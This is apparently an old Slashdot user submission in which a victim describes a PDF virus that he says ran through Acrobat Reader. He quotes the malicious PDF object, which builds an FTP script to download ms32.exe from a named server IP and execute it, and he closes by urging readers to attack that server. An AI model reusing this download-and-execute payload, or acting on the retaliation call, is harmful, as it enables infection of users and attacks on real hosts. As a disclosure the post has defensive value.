Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

PDF virus targets Acrobat READER

hoggoth (414195) writes | more than 6 years ago

Worms 1

hoggoth (414195) writes "The recent outbreak of the 'Peachy' virus showed that PDFs can carry dangerous content. All of the news outlets are repeating Adobe's statement that only the full Acrobat suite can activate the virus, that the free Acrobat Reader is immune. However as a victim of a PDF carried virus I can tell you it's not true. This morning I got an email from a financial services firm I have an account with to an email address I set up just for that financial services firm. This led me to stupidly trust the email that contained a PDF attachment. When I clicked on it a window popped up and went away; very suspicious behavior. So I looked closer at the PDF file and found that it contained a mailto: that put some DOS commandline instructions in a file and executed them, which contacted a server, downloaded an executable, and ran it. The meat of the offending part is this: 14 0 obj7&@echo binary>>7&@echo get /ms32.exe>>7&@echo quit>>7&@ftp -s:7 -v -A>nul&@del /q 7&@start ms32.exe&\" \"&\" "con.cmd)/S/URI>> This calls cmd.exe with a long command that turns off your firewall, FTP's into the offending site, downloads a rogue version of ms32.exe, and runs it. The virus installed a number of files to my computer and modified the startup to run them. I *think* I got rid of it all, although one can never be sure today with rootkits and all. I googled all over, and I think this is 'breaking news'. Every outlet is still saying Acrobat Reader is safe. Entities to Hate: The virus server at 203.121.69.116 Financial services institutions that sell your private email address to marketers. Adobe for allowing PDFs to execute cmd.com. Adobe for lying about Acrobat Reader being safe. Microsoft for their entire insecure operating system. Come on, outside data is allowed to run and TURN OFF THE FIREWALL?! Please feel free to pound that FTP server's IP address with all the hate you can muster."

cancel ×

1 comment

Check for New Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...